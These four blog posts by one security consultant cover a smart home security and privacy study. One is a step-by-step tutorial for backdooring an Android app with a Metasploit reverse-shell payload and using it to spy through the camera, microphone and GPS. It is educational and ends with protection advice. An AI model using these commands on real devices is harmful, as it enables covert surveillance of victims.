Smart Home Devices: assets or liabilities? – Part 3: Looking at the future

29 March 2021 at 12:54

This blog post is the last part of a series; if you are interested in the security or privacy of smart home devices, be sure to check out the other parts as well!

TL;DR: In our previous blog posts we concluded that there is quite a long way to go for both security and privacy of smart home environments. In this one, we will take a look at what the future might bring for these devices.

Introduction

After taking a close look at a series of smart home devices and assessing how well they held up to the expectations of the buyer when it comes to security and privacy, we will propose a few solutions to help the industry move forward and the consumer to make the right decision when buying a new device.

A recap

To freshen up your memory, we’ll quickly go over the key takeaways of our previous blog posts. If you haven’t read them yet, feel free to check out the parts about security and privacy of smart home environments as well!

Security

When it came to security, many of the devices we tested swung one of two ways: either security had played a major role in the manufacturing process and the device performed well across the board, or the manufacturer didn’t give a hoot about security and the device was lacking any kind of security measures altogether. This means that buying one of these devices is a pretty big hit or miss, especially for the less tech-savvy consumer.

To overcome this issue, some form of consumer guidance is needed to steer buyers towards devices that offer at least the baseline of security measures one could reasonably expect of a device that will eventually be installed in their household.

Privacy

Privacy often didn’t fare much better. Just like with security, there is a massive gap in maturity between manufacturers that put in an effort to be GDPR compliant and those that didn’t. Luckily, the industry has undergone a major shift in mentality, and most companies at least showed a lot more goodwill towards the people whose data they are collecting. Nevertheless, my results made it very clear that stronger enforcement and more transparency around fines and sanctions are needed.

How can we regulate?

Regulating the market can be done in many ways, but for this blog post we’ll take a look at two approaches that have historically also been used for other products: binding standards and certifications, and voluntary quality labels. Each of these has its own advantages and disadvantages.

Standardisation & Certification

The security industry is rife with standards: there is ISO/IEC 27001 to ensure organisations and their services adhere to proper security practices; for secure development, there are standards such as OWASP SAMM and DSOMM; when it comes to security assessments of specific services or devices, standards such as OWASP’s ASVS and MASVS come to mind. For IoT devices, this is no different: OWASP’s ISVS (IoT Security Verification Standard) offers a standardised, controlled methodology to test the security of IoT devices. And these are just the tip of the iceberg: there is a massive number of resources that can be used, as reflected in this graph. The fact that so many standards exist reflects the need for specialised, industry-specific guidance: a “one-size-fits-all” solution may not exist.

Standards
Did anyone mention standards?
(Image source: XKCD, used under CC BY-NC 2.5)

Mandatory quality requirements and certification against certain standards are nothing new if we take a look at other markets. Take the food industry for example, where rigorous requirements ensure that the meals we put on our table at the end of the day won’t make us sick. But even when we look closer to the smart home devices market, we see that mandatory labels already exist in some form: the CE label is a safety standard that ensures the consumer goods we purchase in the store won’t malfunction and injure us, and the FCC label ensures they won’t cause any interference with other radio-controlled devices in the area. Whereas these safety-focused labels and standards are commonplace and seen as a given, the concept of a binding cyber security baseline for such smart devices is a relatively new one and is not nearly as easily implemented.

The EU’s Cybersecurity Act (CSA), which was introduced in April 2019, gives the European Union Agency for Cybersecurity (ENISA) a new mandate to build out exactly such certification schemes. In response, ENISA published its first certification scheme candidate, the so-called EUCC, in July 2020. Even closer to home, here in Belgium the legal groundwork is also being laid for a Belgian National Cybersecurity Certification Authority, including provisions to accommodate the EU Common Criteria, Cloud Security and 5G certification schemes.

Taking a look overseas, the USA’s “Internet of Things Cybersecurity Improvement Act of 2020” shows us that the need for stricter regulation of IoT devices is not limited to Europe. This newly passed law is based on NIST’s Internal Report 8259, “Foundational Cybersecurity Activities for IoT Device Manufacturers”, and – you guessed it – it calls for the creation of IoT security standards and guidelines that the US government will adhere to, in the hope that industry will follow suit.

Quality Labels

On top of the baseline, some consumers may be looking for additional safeguards and guarantees that the device they are buying is up to snuff. Especially when purchasing devices that handle more sensitive types of data, such as smart home assistants, cameras, or locks, security plays a larger role for many buyers. In this case, a voluntary quality label could be a good indicator for consumers that the manufacturer went the extra mile, and it would give manufacturers a point to compete on, distinguishing their product from the competitors’ offerings. Just like the certification of the baseline requirements for devices, an IoT quality label is also proposed in the aforementioned EUCC cybersecurity scheme candidate.

Quality labels can be used either to reflect that a device adheres to a certain standard of cyber security or privacy, or to show that it implements additional measures beyond the baseline that are not necessarily found in other devices of the same category. In the case of the EUCC, the label shows the consumer that the device is certified against that particular certification scheme and lists a CSA assurance level (Basic, Substantial, or High) to reflect how advanced the security measures of the device are.

Proposed Label by the EUCC
(Image source: EUCC Candidate Scheme, ENISA)

The EUCC is not the first certification scheme that mentions a quality label. In the context of industrial control systems, the IEC 62443-4-1 and 62443-4-2 standards – which formulate guidelines for the production lifecycle and technical guidelines for the security of products – also provide a certification scheme and label, but adoption within the industry has been very slow.

While a widely adopted quality label is not available yet, in the meantime manufacturers can still distinguish themselves by being transparent about the security of their products: how about a page on the website that outlines the efforts spent on security?

Conclusion

To guide the smart home industry towards a better, more solid security baseline and stronger privacy guarantees, binding regulations for all devices sold within the EU can pave the way. These regulations should be based on the mandated use of secure building blocks and easy-to-verify guidelines. The recent Cybersecurity Act gives ENISA a new mandate to create exactly such certification schemes, the first of which was released in July 2020 in the form of the EUCC.

Additionally, a voluntary IoT quality label can be a strong indicator for consumers who want more than just a baseline of security measures and a competition point for manufacturers who want to prove they went the extra mile.

This research was conducted as part of the author’s thesis dissertation, submitted to obtain his Master of Science: Computer Science Engineering at KU Leuven; device purchases were funded by NVISO Labs. The full paper is available via the KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Backdooring Android Apps for Dummies

31 August 2020 at 07:57

TL;DR – In this post, we’ll explore mobile malware: how it is created, what it can do, and how to avoid it. Are you interested in learning more about how to protect your phone from shady figures? Then this blog post is for you.

Introduction

We all know the classic ideas about security on the desktop: install an antivirus, don’t click suspicious links, don’t go to shady websites. Those that take it even further might place a sticker over the webcam of their laptop, because that is the responsible thing to do, right?

But why do most people not apply this logic when it comes to their smartphones? If you think about it, a mobile phone is the ideal target for hackers to gain access to. After all, they often come with not one, but two cameras, a microphone, a GPS antenna, speakers, and they contain a boatload of useful information about us, our friends and the messages we send them. Oh, and of course we take our phone with us, everywhere we go.

In other words, gaining remote access to someone’s mobile device enables an attacker to do all kinds of unsavoury things. In this blog post I’ll explore just how easy it can be to generate a rudimentary Android remote administration trojan (or RAT, for short).

  • Do you simply want to know how to avoid these types of attacks? Then I suggest you skip ahead to the section “How to protect yourself” further down the blog post.
  • Do you want to learn the ins and outs of mobile malware making? Then the following section will guide you through the basics, step by step.

It’s important to know that this Metasploit RAT is a very well-known malware strain that is immediately detected by practically any AV solution. This tutorial speaks of a rudimentary RAT because it lacks a lot of the functionality you would find in actual malware in the wild, such as obfuscation to remain undetected, or persistence to retain access to the device even when the app is closed. Because we are simply researching the possibilities of these types of malware and are not looking to attack a real target, this method will do just fine for this tutorial.

Cooking yourself some mobile malware; a recipe

Ingredients

  • A recent Kali VM with the latest Metasploit Framework installed
  • A spare Android device
  • [Optional] A copy of a legitimate Android app (.apk)

Instructions

Step 1 – Find out your IP address

To generate the payload, we will need to find out some more information about our own system. The first piece of information we’ll get is our system’s IP address. For the purpose of this blog post we’ll use our local IP address but in the real world you’d likely use your external IP address in order to allow infected devices to connect back to you.

Our IP address can simply be found by opening a terminal window, and typing the following command:

ip a

The address I will use is the one from the eth0 network adapter, more specifically the local IPv4 address as circled in the screenshot.

Step 2 – Generate the payload

This is where the real work happens: we’ll generate our payload using msfvenom, a payload generator included in the Metasploit Framework.

Before you start, make sure you have the following ready:

  1. Your IP address as found in the previous step
  2. Any unused port to run the exploit handler on
  3. (Optional) A legitimate app to hide the backdoor in

We have two options: either we generate the payload standalone, or we hide it as part of an existing legitimate app. While the former is easier, we will go a step further and use an old version of a well-known travel application to disguise our malware.

To do this, open a new terminal window and navigate to the folder containing the legitimate copy of the app you want to backdoor, then run the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your ip address> LPORT=<your unused port> -x <legitimate app> -k -o <output name>

For this blog post, I used the following values:

  • <your ip address> = 192.168.43.6
  • <your unused port> = 4444
  • <legitimate app> = tripadvisor.apk
  • <output name> = ta-rat.apk
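
Filled in with those values, the full command looks like this:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.6 LPORT=4444 -x tripadvisor.apk -k -o ta-rat.apk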

Step 3 – Test the malware

Having our payload is all fine and dandy, but in order to send commands to it, we need to start a listener on our Kali VM on the same port we used to create our malware. To do this, run the following commands:

msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <your ip address>
set lport <your unused port>

run
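
As a side note: if you find yourself restarting this listener often, msfconsole can also read commands from a resource script so you don’t have to retype them every time. A minimal sketch, assuming you save the handler commands above (everything after msfconsole) in a file called handler.rc:

msfconsole -r handler.rc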

Now that we have our listener set up and ready to accept connections, all that remains for us to do is run the malware on our spare Android phone.

For the purposes of this blog post, I simply transferred the .apk file to the device’s internal storage and ran it. As you can see in the screenshot, the backdoored application requires quite a lot more permissions than the original does.

The original app permissions (left) and the malicious app permissions (right)
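
As a side note: if USB debugging is enabled on the test device, you don’t even have to copy the file over manually – the backdoored app can be sideloaded with adb instead (assuming the Android platform tools are installed and the device is connected over USB):

adb install ta-rat.apk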

All that’s left now is to run the malicious app, and …

We’re in!

Step 4: Playing around with the meterpreter session

Congratulations! If you successfully reached this step, it means you have a working meterpreter session opened on your terminal window and you have pwned the Android phone. So, let’s take a look at what we can do now, shall we?

Activating the cameras

We can get a glimpse into who our victim is by activating either the front or the rear camera of the device. To do this, type the following command in your meterpreter shell:

webcam_stream -i <index>

Where <index> is the index of the camera you want to use. In my experience, the rear camera was index 1, while the selfie camera was at index 2.

Recording the microphone

Curious about what’s being said in the victim’s vicinity? Try recording the microphone by typing:

record_mic -d <duration>

Where <duration> is the duration you want to record in seconds. For example, to record 15 seconds of audio with the device’s built-in microphone, run:

record_mic -d 15

Geolocation

We can also find out our victim’s exact location by typing:

geolocate

This command will give us the GPS coordinates of the device, which we can simply look up in Google Maps.

Playing an audio file

To finish up, we can play any .wav audio file we have on our system, by typing:

play <filename>.wav

For example:

play astley.wav

Experimenting with other functionality

Of course, these are just a small set of commands the meterpreter session has to offer. For a full list of functionalities, simply type:

help

Or for more information on a specific command, type:

<command> -h

And play around a bit to see what you can do!

Caveats

During my initial attempts to get this to work, there were a few difficulties that you might also run into. The most difficult part of the process is finding an app to add the backdoor to. Most recent Android apps prevent you from easily decompiling and repackaging them by employing various obfuscation techniques that make it much more difficult to insert the malicious code. For this exercise, I went with an old version of a well-known travel app that did not (yet) implement these techniques, as trying to backdoor any of the more recent versions proved unsuccessful.

This is further strengthened by the fact that Android’s permissions API is constantly evolving to prevent this type of abuse by malicious apps. It is therefore not possible to get this exploit to work on the newest Android versions, which require explicit user approval before granting the app any dangerous permissions at runtime. That said, if you are an Android phone user reading this post, be aware that new malware variants constantly see the light of day, and you should always think twice before granting any application a permission it does not strictly require – yes, even if you have the latest security updates on your device. Even though the methods described in this blog post only work on less recent versions of Android, these versions still represent the majority of the Android market share, so an enormous number of devices remain vulnerable to this exploit to this day.

There are some third-party tools and scripts on the internet that promise to achieve more reliable results in backdooring even more recent Android apps. However, in my personal experience these tools did not always live up to expectations. Your mileage may vary in trying these out, but in any case, don’t blindly trust the ReadMe of code you find on the internet: check it yourself and make sure you understand what it does before you run it.

How to protect yourself

Simply put, protecting yourself against these types of attacks starts with realising how these threats make their way onto your system. Your phone already takes a lot of security precautions against malicious applications, so it’s a good start to always make sure your phone is running the latest update. Additionally, you will need to think twice: once when you choose to install the application, and one more time when you choose to grant the application certain permissions.

First, only install apps from the official app store. Seriously. The app stores for both Android and iOS are strictly curated and scanned for viruses. Is it impossible that a malicious app sneaks by their controls? Not entirely, but it is highly unlikely that it will stay in the store for long before it’s noticed and removed. On iOS, you don’t have much of a choice anyway: if you have not jailbroken your device, you are already restricted to the App Store. For Android, there’s a setting that also allows you to install apps from unknown sources. If you simply want to enjoy the classic experience your smartphone offers you, you won’t need to touch that setting at all: the Google Play Store likely has everything you’d ever want. If you are a more advanced user who wants to fully customise their phone and even root it or add custom ROMs: be my guest, but be extra careful when installing anything on your phone, as you lose a large amount of the protections the Google Play Store offers you. Experimenting with your phone is fine, but you need to be very aware of the additional risks you are taking. That goes double if you are downloading unofficial apps from third-party sources.

Second, not all apps need all the permissions they ask for. A flashlight application does not need access to your microphone to function properly, so why would you grant it that permission? If you are installing an application and the permission list seems suspiciously long, or certain items definitely are not needed for that app to function, maybe reconsider installing it in the first place, and definitely do NOT give it those permissions. In the best case, they are invading your privacy by tracking you for advertising. In the worst case, a criminal might be trying to exploit the permissions to spy on you.

One last tip I’d like to give is to leave the security settings on your device enabled. It doesn’t matter if you have an iPhone or an Android phone: both iOS and Android have some great security options built in. This also means you won’t need third-party antivirus apps on your phone. Often, these apps provide little extra functionality, as they are much more restricted in what they can do compared to the native security features your mobile phone OS already offers.

Conclusion

If there is anything I’d like you to remember from reading this blog post, it’s the following two points:

1. Creating Mobile Malware is Easy. Almost too easy.

This blog post went over the steps needed to make a rudimentary Android malware, demonstrating how easy it can be to compromise a smartphone. With a limited set of tools, we can generate a meterpreter reverse shell payload, hide it in an existing app, repackage it, and install it on an Android device. Anyone with enough motivation can learn to do this in a limited time frame, without needing a large amount of technical knowledge.

2. Smartphones are computers, they need to be protected.

It might not look like one, but a smartphone is a computer just like the one sitting on your desk. These devices are equally vulnerable to malware, and even though the creators of these devices already take a lot of precautions, the user is ultimately responsible for keeping their device safe. Smartphone users should be aware of the risks their devices face: stay away from unofficial applications outside of the app store, enable the security settings on your device, and be careful not to grant excessive permissions to apps, especially ones from untrusted sources.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their cyber security strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Smart Home Devices: assets or liabilities? – Part 2: Privacy

30 November 2020 at 09:52

TL;DR – Part two of this trilogy of blog posts will tackle the next big topic when it comes to smart home devices: privacy. Are these devices doubling as the ultimate data collection tool, and are we unwittingly providing the manufacturers with all of our private data? Find out in this blog post!

This blog post is part of a series – you can read part 1 here, and keep an eye out for the next part too!

Security: ✓ – Privacy: ?

In my previous blog post, I gave some insights into the security level provided by a few Smart Home environments that are currently sold on the European market. In conclusion, I found that the security of these devices is often a hit or miss and the lack of transparency around security means it can be quite difficult for the consumer to choose the good devices as opposed to some of the bad apples. There is one major topic missing from it though: even if a device is secure, how well does it protect the user’s privacy?

Privacy concerns

It turns out that this question is not unjustified: just like the security concerns surrounding smart home devices, privacy concerns are at least equally present, maybe even more so. The fear that our own house is spying on us is something that should be prevented by transparency and strong data subject rights.

These data subject access rights might have already been there on paper for a long time, but it’s never been easy to enforce them in practice. I strongly recommend looking at this paper by Jef Ausloos and Pierre Dewitte that shows just how difficult it used to be to get a data controller to comply with existing regulation.

Does this mean that there is no hope? Well, not exactly. Since then, the GDPR has come into effect. Even though it might still be too early to see concrete results, there have been some developments moving in the right direction. Just a few months ago, in July 2020, the EU-US Privacy Shield was declared invalid by the Court of Justice of the EU in a case brought by Max Schrems’ NGO ‘noyb’ (‘none of your business’). This decision means that data transfers from the EU to the US are subject to the same requirements as transfers to any other country outside of the EU.

Existing regulation in Europe

So, which laws are there that protect our privacy anyway? To start with the basics, the European Convention on Human Rights and the Charter of Fundamental Rights of the European Union lay the groundwork for every individual’s right to privacy in their Article 8 and Article 7 respectively. These articles state that: “Everyone has the right to respect for his private and family life, his home and his correspondence.”

On top of these, there used to be Directive 95/46/EC, which outlined the requirements each EU member state had to implement in its national privacy regulation. However, each member state could implement these requirements at its own discretion, which led to a lot of diverging laws between EU member states. The directive was eventually repealed when the GDPR took its place.

The General Data Protection Regulation (GDPR) is the current regulation that harmonises privacy regulation across all EU member states. Its well-known new provisions enable data subjects to more effectively enforce their rights and protect the privacy of all people within the EU – or at least they do so on paper.

From paper to practice

Aside from testing the security of each device, I decided to also include some privacy tests in the scope of my assessments. For more information on the choice of devices, make sure to check out my previous blog post!

For each device, I added privacy-related tests in two major fields:

  • privacy policies: I verified if, for each device, the privacy policy contained all the relevant information it should have according to GDPR;
  • data subject access rights: I contacted each vendor’s privacy department with a generic data subject access request, asking them to give me a copy of the personal data they held about me.

Privacy policies: all or nothing

The first step in checking the completeness of a privacy policy is finding out where it is published – if it even exists. In many cases, finding a privacy policy was easy, but finding the right one was a different story. Many vendors had multiple versions of the policy, sometimes different editions for the USA and the EU, and other times they simply excluded everything from their scope except the website – not very useful for this research.

The privacy policies showed the exact same phenomenon I had already seen in the security part of the research: if a vendor was compliant on one part, they usually put in a good attempt to be compliant across the board. The opposite was also true: if a policy was incomplete, it often didn’t contain any of the information required by the GDPR. The specific elements that need to be included in a privacy policy under the GDPR are outlined in Article 13. The table below shows which of the policies adhered to which provisions of this article.

The results of checking each privacy policy
(Image credit: see “Reference” below)

Access requests: hide & seek

In the exact same way that it can be difficult to locate a privacy policy, it can sometimes be a real hassle to find the correct contact details to submit a data access request. Most vendors with a compliant privacy policy listed either an email address of the DPO or a link to an online form as a means of contact. In case I could not locate the correct contact details, I would attempt to reach them a single time by emailing their general information address or contacting their customer support. I would also send out a single reminder to each vendor if they had not replied after one month.

What it feels like trying to reach the DPO of many manufacturers
(Image credit: imgflip.com)

Surprisingly, many vendors straight up ignored the request: one third (!) of requests went unanswered. Those that did reply usually responded quite quickly after receiving the initial request, with a few exceptions that requested deadline extensions or simply claimed to “have never received the initial email” after being sent a reminder.

One third of the sent requests went unanswered
(Image credit: see “Reference” below)

Most importantly, the number of satisfactory replies after running this experiment for over 5 months was disappointingly low. Often, either the answers to the questions in the request or the returned data itself were strongly lacking. In some cases, no satisfying answer was given at all. In one or two notable instances, however, the follow up of the privacy department was excellent and an active effort was made to comply with the request as well as possible.

The aftermath

From these results, it’s clear that there are some changes to be seen in the privacy landscape. Here and there, companies are putting in an effort to be GDPR compliant, with varying effectiveness. However, just like with security, there is a major gap in maturity between the different vendors: the divide between those that attempt to be compliant and those that are non-compliant is massive. Most notably, the companies that ignored access requests or had outdated privacy policies were those that might deem themselves too small to be “noticed” by the authorities, or that are simply located too far from the EU to care. This suggests a need for more active enforcement, including against companies incorporated outside of the EU, and more transparency surrounding the fines and penalties imposed on those that are non-compliant.

Even though privacy compliance is moving in the right direction, there is still a lot of progress to be made in order to reach an acceptable baseline of compliance across the industry. Active enforcement and increased transparency surrounding fines and penalties are needed to motivate organisations to invest in their privacy and data protection maturity.

Stay tuned for Part 3 of this series, in which I’ll be discussing some options for dealing with the issues I found during this research.


This research was conducted as part of the author’s thesis dissertation, submitted to obtain his Master of Science: Computer Science Engineering at KU Leuven; device purchases were funded by NVISO Labs. The full paper is available via the KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Smart Home Devices: assets or liabilities? – Part 1: Security

14 September 2020 at 11:12

This blog post is part of a series, keep an eye out for the following parts!

TL;DR – Smart home devices are everywhere, so I tested the baseline security measures implemented on fifteen devices on the European market. In this blog post, I share my experience throughout these assessments and my conclusions on the overall state of security of this fairly new industry. Spoiler alert: the industry has a long road ahead when it comes to security maturity.

Great new toys, great new responsibilities

Increasingly often, we are surrounding ourselves with connected devices. Even those who are adamant about not having any “smart devices” in their homes usually happily switch on their smart TV at the end of a long day while they drop down on the sofa. According to market studies and economic forecasts, the market share of smart home devices has been steadily rising for quite some time now, and that is not expected to be changing anytime soon. Smart home environments are everywhere these days, and for the most part they make our lives a lot more convenient.

However, there is another side to the coin: just like the devices themselves, news coverage about security concerns surrounding these devices has been popping up weekly, if not daily. Crafty criminals are tricking smart voice assistants into opening garage doors, circumventing ‘smart’ alarms, or even spying on people through their internet-connected cameras. We’ve already taken a deep dive in the past into some smart alarms, which showed their security left a lot to be desired. This raises the question: how secure are these devices we introduce into our daily lives, really? I’ve tried to find out exactly that.

The words none of us want to hear when we ask our smart assistant to unlock the front door.
(Image credit: Wikimedia Foundation)

Research methodology

To get an idea of the overall security of Smart Home devices on the European market, I selected fifteen devices, chosen in such a way that they represented as many different product categories, price ranges and brands as possible. Where possible, I made sure to get at least two devices of different price ranges and brands in each category to be able to compare them.

Devices of all kinds were chosen for the tests.
(Image credit: see “Reference” below)

Then, I subjected each device to a broad security assessment. Each assessment consisted of a series of tests that were based on ENISA’s “Baseline Security Recommendations for IoT”. Here, the goal was not to conduct a full in-depth assessment of each device, but to get an overview on whether each device implemented the baseline of security measures a customer could reasonably expect from an off-the-shelf smart home solution. In order to guarantee repeatability of the tests, I mostly relied on automated industry-standard testing tools, such as nmap, Wireshark, Burp Suite, and Nessus.

In my tests, I covered the following range of categories: Network Communications, Web Interfaces, Operating Systems & Services, and Mobile Applications.

Network Communications

Because (wireless) network communications make up a large part of the attack surface of Smart Home devices, I performed a network capture of the traffic of each device for an idle period of 24 hours.
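
As an illustration of what such a capture could look like in practice (this is a sketch, not necessarily the exact setup used in the research): from a machine that can see the device’s traffic, tcpdump can record 24 hours of packets to a pcap file. The interface name, device IP, and output file name below are placeholders.

sudo timeout 86400 tcpdump -i eth0 -w device_idle.pcap host 192.168.1.50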

Without even looking into the data itself, it’s already interesting to note the vast differences in the number of captured packets within this period, where smart voice assistants and cameras are the clear winners.

Why does a doorbell send that many packets?
(Image credit: see “Reference” below)

In the figure below, you can see the different protocols that these devices used.

Oh, and all of the devices used DNS of course!
(Image credit: see “Reference” below)

When we think about network security, the encryption of the data is the most obvious security control we can check. However, this is not always easy: Wireshark will tell you whether TLS is being used, but aside from that, how can we determine whether a raw TCP or UDP data stream is encrypted? For this, I used two scripts written by my colleague, Didier Stevens: simple_tcp_stats and simple_udp_stats.

These scripts calculate the average Shannon Entropy in each data stream. Streams with a high entropy value are likely encrypted, whereas streams with a low entropy value will likely contain natural text or structured data. The results were surprising: when mapping the different entropy scores in some box plots, many devices had multiple data streams with low entropy values, indicating that data was likely not being encrypted.

  • Lower score means data is less likely to be encrypted.
  • Keep in mind (unencrypted) DNS was included in these graphs.
Anybody order some entropy boxplots?
(Image credit: see “Reference” below)
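
For those wondering what these scripts actually measure: the Shannon entropy of a byte stream is −Σ p(b)·log₂ p(b), summed over all 256 possible byte values, where p(b) is the relative frequency of byte b. Well-encrypted (or compressed) data approaches the theoretical maximum of 8 bits per byte, while plaintext or structured data scores noticeably lower. As a minimal sketch of the underlying calculation (my own illustration, not Didier’s scripts), you can compute this for a single stream exported from Wireshark via “Follow TCP Stream” and saved as raw bytes; stream.bin is a placeholder file name:

python3 -c 'import sys, math, collections
data = sys.stdin.buffer.read()              # raw bytes of one captured stream
counts = collections.Counter(data)          # frequency of each byte value
n = len(data)
entropy = -sum(c/n * math.log2(c/n) for c in counts.values())
print(round(entropy, 2), "bits per byte (max 8)")' < stream.bin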

The above results indicate that while some devices did use state-of-the-art, standardised, and most importantly secure network protocols, about half of them used something that was either not recognised by Wireshark (e.g. raw TCP/UDP streams) or has been proven insecure in the past (e.g. TLS 1.0). The results of the entropy testing are striking: every single device was guilty of sending some data that was likely not encrypted – even the devices that encrypted the majority of their communications still sent DNS, and sometimes NTP, requests unencrypted over the network.

Web Interfaces

A lot of devices need some type of interface to interact with them. In most cases, that’s the mobile application accompanying the device. Sometimes, devices also support interactions via a web interface. Then, there are two options: a local interface, directly running on the device, or a cloud interface that runs on online servers maintained by the manufacturer. In the case of the latter, which made up most of the devices, doing in-depth testing was simply not possible due to legal limitations. However, one thing I could do was scan the cloud interface for SSL/TLS vulnerabilities with Qualys SSL Labs. I tested local interfaces by running an active scan in Burp Professional and performing a nikto scan.
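
To give an idea of what such a local scan looks like (a sketch with a placeholder IP address, not the exact commands from the research), nikto simply takes the target host or URL with its -h option:

nikto -h http://192.168.1.50/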

On local interfaces, the most common serious flaw I found was the lack of encrypted communications: all of them ran over HTTP and sent credentials (as well as all other information, such as configuration data) in plaintext over the network – something that has been considered a serious violation of secure web development practices for a really long time now.

Cloud interfaces were accessible via HTTPS, and all of them scored a B on the SSL Labs test because they all supported old TLS versions 1.0 and/or 1.1. While a B is not an inherently bad score, this indicates many vendors prioritise compatibility over security, as a higher score would be expected of those that want to deliver the best security to their customers.
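
You can spot-check this kind of legacy protocol support yourself with openssl: if the handshake below succeeds, the server still accepts the old TLS version. The hostname is a placeholder, and note that your local openssl build must itself still support TLS 1.0/1.1 for this test to be meaningful.

openssl s_client -connect cloud.example-vendor.com:443 -tls1   < /dev/null
openssl s_client -connect cloud.example-vendor.com:443 -tls1_1 < /dev/null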

All in all, it seems like developers adhered to the regular best practices when it came to cloud portals, but somehow forgot that local web interfaces need the same care and protection as any other exposed service. Just because a device isn’t directly reachable over the internet doesn’t mean that an attacker who has gained access to the local network won’t try to expand their foothold by connecting to the devices within it.

Operating System & Services

I port scanned each device with nmap and ran some basic service discovery and vulnerability scans with Nessus Essentials. Sadly, I found that traditional scanning methods translate very poorly to these smart home devices: service discovery was very unreliable at best and plain wrong in most cases. Vulnerability scanning rarely yielded any interesting results besides some basic informational alerts. This is likely caused by the large amount of proprietary technologies or custom protocols that are being used by these devices.
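
For reference, the port scans themselves were nothing exotic – something along the lines of the command below, where -sV asks nmap to fingerprint the services it finds and -p- scans all 65535 TCP ports (the IP address and output file are placeholders):

nmap -sV -p- -oN smart_device_scan.txt 192.168.1.50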

What this concretely means is that there’s no straightforward, easy way to get an insight in the security of the devices. Gaining such knowledge would require tailored, targeted security assessments: a time consuming and difficult task, even for highly skilled professionals. Pretty discomforting, if you ask me.

Mobile Applications

As I mentioned earlier, users can often interact with their devices via web interfaces or a smartphone app. I performed static analysis on each of the corresponding Android apps with MobSF (Mobile Security Framework); a short sketch of how to run MobSF yourself follows the list below. More specifically, I looked at:

  • the permissions requested by each app;
  • the known trackers embedded in the code;
  • domains that could be found in the code to get an indication of which and how many servers the app was calling out to.
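
As promised above, a sketch of how to run MobSF yourself: the project publishes a Docker image (image name and default port as I recall them from the MobSF documentation – double-check before relying on this), after which you can browse to http://localhost:8000 and upload an .apk to read the static analysis report.

docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest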

I found that a lot of applications were asking for a disproportionately large number of permissions, sometimes even permissions an application arguably does not need to function properly. For example, what use does a smart light bulb app have for the permission to record audio?

‘Dangerous’ permissions are any permissions the user needs to explicitly allow access for.
(Image credit: see “Reference” below)

I also noticed a significant number of mobile apps that included trackers. Most of them seemed to be for bug fixing and crash reporting, but others also included more intrusive tracking for advertising purposes.

Google Firebase Analytics and CrashLytics are likely included for crash reporting.
(Image credit: see “Reference” below)

The Verdict

So, based on all this information, what can we say about the security of the smart home devices currently available on the market? Well, for starters, in all the paragraphs above we can see there are some good things, often followed by a ‘but’. Looking at the bigger picture, devices that were properly secured on one front usually also did well on all the others, while devices that were lacking certain security controls were usually insecure across the board; buying a secure device really is quite a hit or miss. Most notably, my results clearly confirmed what security professionals already knew: security is a complete package. You simply can’t cover one part and leave the other aspects of your product exposed. In products from manufacturers that understood this, I saw network protocols known to be secure, strong authentication options, and user-friendly defaults that made sure security was taken care of with little effort required from the consumer. The other products often treated security as a mere afterthought: something that could be enabled if the user dug deep into the app menus, or sometimes not at all.

What can we do?

Now that we know it’s a hit or miss with these smart home devices, how can we make the right decisions in the store and make sure we don’t end up with one of the bad apples? Is it just a matter of luck, or can we steer the odds in our favour?

Luckily, there are a few things you can look out for; price is one of them, but – as we have already shown in these previous blog posts here and here – it should never be your only indicator. I found that brand recognition is an important factor in the level of attention a manufacturer will pay to the security of their device. If a brand is well known and needs to uphold a good reputation to stay in business, they will also spend more time fixing security flaws in the future, even after their product has been out for some time. And that brings me to the next point: automatic updates.

Even if you have a device that is secure today, if it’s never updated in the upcoming years it will eventually become vulnerable. Therefore, another good indication of security is the presence of updates. Ideally, automatic updates that are pushed to the device by the vendor without the need for user interaction, as we are probably all guilty of deferring updates out of convenience until it’s too late.

Afterthoughts and looking ahead

The overall security of devices on the market seems to be a hit or miss. Currently there are not many indicators consumers can look for when buying a device, but the combination of price, brand recognition and the presence of security updates can already give a general guideline on which device will be a good bet. If we want to get a clearer overview of the actual security of smart home IoT devices, an in-depth manual security assessment is needed because automated tools provide inaccurate or unsatisfying results.

Stay tuned for Part 2 of this series, in which I’ll be talking about smart home devices and privacy!


This research was conducted as part of the author’s thesis dissertation, submitted to obtain his Master of Science: Computer Science Engineering at KU Leuven; device purchases were funded by NVISO Labs. The full paper is available via the KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.
